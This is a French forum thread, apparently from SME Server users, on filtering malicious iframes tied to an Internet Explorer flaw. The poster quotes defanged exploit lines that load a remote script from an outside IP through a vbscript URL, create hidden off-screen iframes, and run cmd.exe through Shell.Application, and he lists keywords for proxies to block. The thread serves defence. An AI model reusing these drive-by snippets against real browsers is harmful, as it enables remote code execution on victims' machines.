bloquer des iframes avec SME:(ADODB.Stream)

[Taltos]

Bonjour je viens de recevoir un mail qui m'interpelle:
la discussion partait sur la nouvelle faille IE

l'explication de cet admin est claire et interresante a lire (si vous avez le temps) je me demandais dans quelle mesure ce filtrage la etait faisable par SME ? (j'ai pas réfléchi a la question, je vous livre cela brut de fonderie)

A pluche



je me suis laisser emporter... a cause d'une discussion en interne a ce sujet et de l'incompréhension des mes users.... veuillez m'excuser...

je vais modérer donc mes propos et tenter de m'expliquer, a défaut d'expliquer...

En fait cette faille exploite plusieurs autres failles connues... les I frames principalement, je ne vais pas vous faire un cours, juste expliquer pourquoi.

Ces i frames que l'on retrouve dans presque tout les emails sans attachements mais qui exectutent des applications (en gros ce sont des Frames HTML dans lesquels on peut inclure d'autres pages... si ces frames ont des tailles visible de 0 -> 99.99% de chance que ce soit un malware, de meme si ces frames sont positionner hors ecran... d'ou une position > 800x600 (ou 1024x768... tres souvent un malware place l'i frame en 10000 x 10000, a ma connaissance il n'y a aucune station normale qui possède une résolution pareil, et aucun site "normale" n'a de raison d'afficher une page, un frame ou ce que vous voulez en dehors de l'écran)

voila donc pourquoi rien ne s'affiche chez moi, car l'I frame de base tente de s'ouvrir en dehors de l'écran, donc -> Malware ou/et virus... donc on bloque...

dans le cas du link donné :
j'ai du mettre un underscore dans certains mot, pour :
* etre certains que votre lecteur n'aura pas la bonne idée d'executer le code...
* ne pas me faire censurer par les robots d'analyse de mail...

il contient ceci, (entre autre)

show_ModalDia_log('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="vbsc_ript:\"<SC_RIPT SRC='http://62.131.86.111/security/idiots/malware2k/shells_cript_loader.js'><\/scr_ipt>\"";

on peut y voir :
* dialogTop et dialogLeft sont HORS ecran !
* dialogHeight et dialogWidth ont une taille de 1

c'est donc pratique d'afficher une fenetre en dehors de l'écran avec une taille ridicule => on ne permet meme pas a la page de passer vers le poste client... trop de facteurs "stupides"
-> première raison de bloquer la page...

plus bas dans cette page...

document.write('<I_FRAME ID=myif_rame NAME=myifra_me SRC="redir.jsp" style=display:none;></I_FRAME>');

* style=display:none -> Intéressant de ne pas voir une fenetre WEB, utile aussi ... ca n'a donc pas d'interet dans 95% des cas, sauf si on a de mauvaise idée en tete...
-> deuxième raison de bloquer la page

ces deux filtres fonctionne chez moi de facon indépendante... ils ont réagit tout les deux... et on interdit l'acces a la page...

mais allons plus loins et regardons le fichier "shellsc/ript_loader.js"

doc_ument.wri_te("<I_FRAME ID=myifra_me SRC='about:blank' WIDTH=200 HEIGHT=200></I_FRAME>");
* cet I frame aurait pu tromper mes systemes de surveillance...

il charge ensuite dedans un autre ficihier "shellscr/ipt.js"

doc_ument.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<scr_ipt language="JSc_ript" DEFER>var obj=new ActiveX_Object("S_hell.Applica_tion");obj.ShellE_xecute("cm_d.exe","/c pause");</sc_ript>');

* alors la c'est le pompon, n'importe quel proxy devrait bannir ce type de page :
New Act_iveXObject mais c'est surtout le paramètre qui devrait alarmer "Sh_ell.App_lication"
et trouver en plus dans le meme fichier quelque chose comme "ShellEx_ecute" ou "C_md.exe"...

donc, si une regle devait etre appliquer pour juger de la pertinance d'une page, c'est bien ces mots la, avant meme les fameux "$%#&!, ou sexe, etc..." mais là c'est un autre débat du genre de celui que l'on a tenter de me faire ce matin....

se protéger n'est pas une mince affaire, mais un peu d'analyse du processus d'attaque via le WEB permet souvent de comprendre et d'arreter avant l'intrusion...

bien a vous,
encore merci a tout ceux qui m'ont lu,
si vous avez des questions n'hésitez pas, je vous le dois bien...

[Muzo]

Salut,

Oui l'analyse est bonne mais, ...
Si tu as peur de recevoir ce genre de mail, tu mets ton serveur de mail en mode text brute, et tout code html sera transformé en text. Donc ton code html ne sera pas exécuté. Tu peux aussi paramétré ton client mail de la même manière.

Enfin bon c'était des idées simples comme ca ....